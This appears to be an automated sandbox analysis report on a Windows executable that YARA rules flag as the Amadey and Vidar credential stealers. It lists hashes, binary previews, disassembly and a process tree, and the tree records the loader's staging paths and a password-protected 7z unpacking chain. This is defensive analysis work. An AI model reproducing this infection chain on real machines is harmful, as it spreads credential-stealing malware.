                                                                                                                                                                                                                              SHA-512:DC785FB72C87AACB5FDDABD96FA600724DF05CCD0CFC2CEE3AD87078B96ABB1C50CB9749BBC78089889BC52499DB77E1B79F6E2C5D2CD9C3F5535D6A8A2899F7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:....\bO..*A.;..L.r5F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe
                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1058336
                                                                                                                                                                                                                              Entropy (8bit):6.827880169201504
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12288:qvUGQWpy+Tac0RDffXJjyYpcyoNHSy5viczPESsQ3BaE32VfXJjyYpz:lGQB+2DR7BWYpcyo44u0aPVBWYpz
                                                                                                                                                                                                                              MD5:971B0519B1C0461DB6700610E5E9CA8E
                                                                                                                                                                                                                              SHA1:9A262218310F976AAF837E54B4842E53E73BE088
                                                                                                                                                                                                                              SHA-256:47CF75570C1ECA775B2DD1823233D7C40924D3A8D93E0E78C943219CF391D023
                                                                                                                                                                                                                              SHA-512:D234A9C5A1DA8415CD4D2626797197039F2537E98F8F43D155F815A7867876CBC1BF466BE58677C79A9199EA47D146A174998D21EF0AEBC29A4B0443F8857CB9
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...w.m..........."...0......(........... ........@.. ....................... ............`.................................K...O....... %.............. r..........p...T............................................ ............... ..H............text........ ...................... ..`.rsrc... %.......&..................@..@.reloc..............................@..B........................H........7................................................................{8...*..{9...*..{:...*..{;...*..{<...*..{=...*..{>...*..{?...*..{@...*..{A...*..{B...*.0..\........(C.....}8.....}9.....}:......};......}<......}=......}>......}?......}@......}A......}B...*.0...........u.......;.....9....(D....{8....{8...oE...9....(F....{9....{9...oG...9....(H....{:....{:...oI...9....(J....{;....{;...oK...9....(L....{<....{<...oM...9....(N....{=....{=...oO...,w(P....{>....{>...oQ...,_(
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe
                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):147968
                                                                                                                                                                                                                              Entropy (8bit):6.454649285943866
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:lOBRrLUOPed9xOi756fJnhsRSK2C22/m4ESZo3XRYzXIkQfyXzdEpx:A/rLVPW0nsP2Xy+TJfWzW7
                                                                                                                                                                                                                              MD5:CC36E2A5A3C64941A79C31CA320E9797
                                                                                                                                                                                                                              SHA1:50C8F5DB809CFEC84735C9F4DCD6B55D53DFD9F5
                                                                                                                                                                                                                              SHA-256:6FEC179C363190199C1DCDF822BE4D6B1F5C4895EBC7148A8FC9FA9512EEADE8
                                                                                                                                                                                                                              SHA-512:FCEA6D62DC047E40182DC4FF1E0522CA935F9AEEFDB1517957977BC5D9AC654285A973261401F3B98ABF1F6ED62638B9E31306FD7AAEB67214CA42DFC2888AF0
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe, Author: Joe Security
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....ag.....................`....................@...........................#.............................................(................................p#.........................................\............................................text...x........................... ....rdata...1.......2..................@..@.data....!!..0......................@....00cfg.......`#......*..............@..@.reloc.......p#......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):350
                                                                                                                                                                                                                              Entropy (8bit):5.0682682106683945
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:AMMyS3pt+uoQcAxXF2SaioBQypHSTgqF1AivwtHgNmtQFfpap1tNjtv:pMpDh5RwXSTgqFyYwzuJA1tNp
                                                                                                                                                                                                                              MD5:2F644B7E25627553C5731B735473C859
                                                                                                                                                                                                                              SHA1:5A3C2158A1FCF27AE6807A8079894FFE8D33FBEA
                                                                                                                                                                                                                              SHA-256:2B34B0DE62F49C19D1F9A004AD698E2612F7FCD5072F5C9834621C62F15FB55F
                                                                                                                                                                                                                              SHA-512:E83CA818C9785EB3A0297E65F08E22DC9E29A368BCADC9887B64EC746C88B79ACBAD20B4B6D49C07CB819ACE21B00C2BEB083F18A0CD5528D2BD00A7B0C4E802
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:..7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21....Scanning the drive for archives:.. 0M Scan. .1 file, 1799594 bytes (1758 KiB)....Extracting archive: extracted\file_1.zip..--..Path = extracted\file_1.zip..Type = zip..Physical Size = 1799594.... 0%. .Everything is Ok....Size: 1827328..Compressed: 1799594..
                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Entropy (8bit):6.518795012161611
                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                              File name:file.exe
                                                                                                                                                                                                                              File size:2'989'568 bytes
                                                                                                                                                                                                                              MD5:3799f4f2cfc27184ce70913f4ec3a8be
                                                                                                                                                                                                                              SHA1:4424871cdfd4f9b4fb1039049a75844401a7c358
                                                                                                                                                                                                                              SHA256:f95df3026cf4edcc3d334bfc20d188de06ea4e4497e94c63504b2b783dc3e55e
                                                                                                                                                                                                                              SHA512:f38b986c639eb2c676e0ecd9316cea437934550d772f5494e2589626e826a5d23954398c3e4eb4584594e5e6cbea28ffe195bea27d2674f1a8119ca14ee869a0
                                                                                                                                                                                                                              SSDEEP:49152:HPwL/gU97fpS9iZXovvQyWVkeRJFm0w7KwKz:vwLY47fpkyYvv7sbP
                                                                                                                                                                                                                              TLSH:DFD54A92B50AB1CFD49E17B48067CD46BBAD43F98B2048C7A82D65BE7E63CC151B6C34
                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................
                                                                                                                                                                                                                              Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                              Entrypoint:0x715000
                                                                                                                                                                                                                              Entrypoint Section:.taggant
                                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                              Time Stamp:0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                              OS Version Major:6
                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                              File Version Major:6
                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                              jmp 00007FD7ECB2E24Ah
                                                                                                                                                                                                                              haddps xmm5, dqword ptr [00000000h]
                                                                                                                                                                                                                              add cl, ch
                                                                                                                                                                                                                              add byte ptr [eax], ah
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [ecx], al
                                                                                                                                                                                                                              or al, byte ptr [eax]
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], dh
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [edi], bh
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [edx], ah
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [ecx], cl
                                                                                                                                                                                                                              add byte ptr [eax], 00000000h
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              adc byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add dword ptr [edx], ecx
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              xor byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              and al, 00h
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              and dword ptr [eax], eax
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add dword ptr [eax+00000000h], eax
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              adc byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add cl, byte ptr [edx]
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              xor byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              push es
                                                                                                                                                                                                                              add byte ptr [eax], 00000000h
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              adc byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add dword ptr [edx], ecx
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              xor byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add al, 00h
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              or dword ptr [eax+00000000h], eax
                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x5d4.rsrc
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x312e100x10uyzzfcwd
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x312dc00x18uyzzfcwd
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                              0x10000x680000x2de00e7aa2b5db78b412f91f98889bda0ac2bFalse0.9983981181880109data7.9890404804965165IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                              .rsrc0x690000x5d40x400be27bfc0824df34a3c01a070f4d6f678False0.7109375data5.8393818684583305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                              .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                              uyzzfcwd0x6b0000x2a90000x2a840000faefff446635bdb6d79e8a14b4bf55unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                              cnrltnzy0x3140000x10000x400af9280a696a5cf1e57dcd85e1e3e83f4False0.7607421875data6.051880691457294IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                              .taggant0x3150000x30000x2200733bba7c850e5f3236464019639b8cb9False0.05618106617647059DOS executable (COM)0.6905175093846538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                              RT_MANIFEST0x312e200x3e4XML 1.0 document, ASCII text0.48092369477911645
                                                                                                                                                                                                                              RT_MANIFEST0x3132040x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                                              kernel32.dlllstrcpy
                                                                                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                              EnglishUnited States
                                                                                                                                                                                                                              Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                              Start time:21:13:01
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                              Imagebase:0x50000
                                                                                                                                                                                                                              File size:2'989'568 bytes
                                                                                                                                                                                                                              MD5 hash:3799F4F2CFC27184CE70913F4EC3A8BE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1724316181.0000000004690000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:1
                                                                                                                                                                                                                              Start time:21:13:06
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                                                                                                                                              Imagebase:0x6f0000
                                                                                                                                                                                                                              File size:2'989'568 bytes
                                                                                                                                                                                                                              MD5 hash:3799F4F2CFC27184CE70913F4EC3A8BE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1806081800.00000000006F1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.1764848025.00000000049D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                              Start time:21:14:00
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                              Imagebase:0x6f0000
                                                                                                                                                                                                                              File size:2'989'568 bytes
                                                                                                                                                                                                                              MD5 hash:3799F4F2CFC27184CE70913F4EC3A8BE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000003.2303212460.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                              Start time:21:14:23
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe"
                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                              File size:4'438'776 bytes
                                                                                                                                                                                                                              MD5 hash:3A425626CBD40345F5B8DDDD6B2B9EFA
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                              • Detection: 87%, ReversingLabs
                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                                              Start time:21:14:27
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                                                                                                                                                                                                                              Imagebase:0x7ff73f470000
                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                                              Start time:21:14:27
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                                              Start time:21:14:27
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\mode.com
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:mode 65,10
                                                                                                                                                                                                                              Imagebase:0x7ff7742b0000
                                                                                                                                                                                                                              File size:33'280 bytes
                                                                                                                                                                                                                              MD5 hash:BEA7464830980BF7C0490307DB4FC875
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                                              Start time:21:14:27
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                                                                                                                                                                                                                              Imagebase:0x1d0000
                                                                                                                                                                                                                              File size:468'992 bytes
                                                                                                                                                                                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                                                              Start time:21:14:27
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:7z.exe e extracted/file_7.zip -oextracted
                                                                                                                                                                                                                              Imagebase:0x1d0000
                                                                                                                                                                                                                              File size:468'992 bytes
                                                                                                                                                                                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                                              Start time:21:14:27
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:7z.exe e extracted/file_6.zip -oextracted
                                                                                                                                                                                                                              Imagebase:0x1d0000
                                                                                                                                                                                                                              File size:468'992 bytes
                                                                                                                                                                                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                                                              Start time:21:14:28
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:7z.exe e extracted/file_5.zip -oextracted
                                                                                                                                                                                                                              Imagebase:0x1d0000
                                                                                                                                                                                                                              File size:468'992 bytes
                                                                                                                                                                                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                                              Start time:21:14:28
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe"
                                                                                                                                                                                                                              Imagebase:0x7d0000
                                                                                                                                                                                                                              File size:22'016 bytes
                                                                                                                                                                                                                              MD5 hash:04F57C6FB2B2CD8DCC4B38E4A93D4366
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000F.00000002.2742198429.0000000003B95000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000F.00000002.2742198429.0000000003CBA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                              • Detection: 57%, ReversingLabs
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                                                              Start time:21:14:28
                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
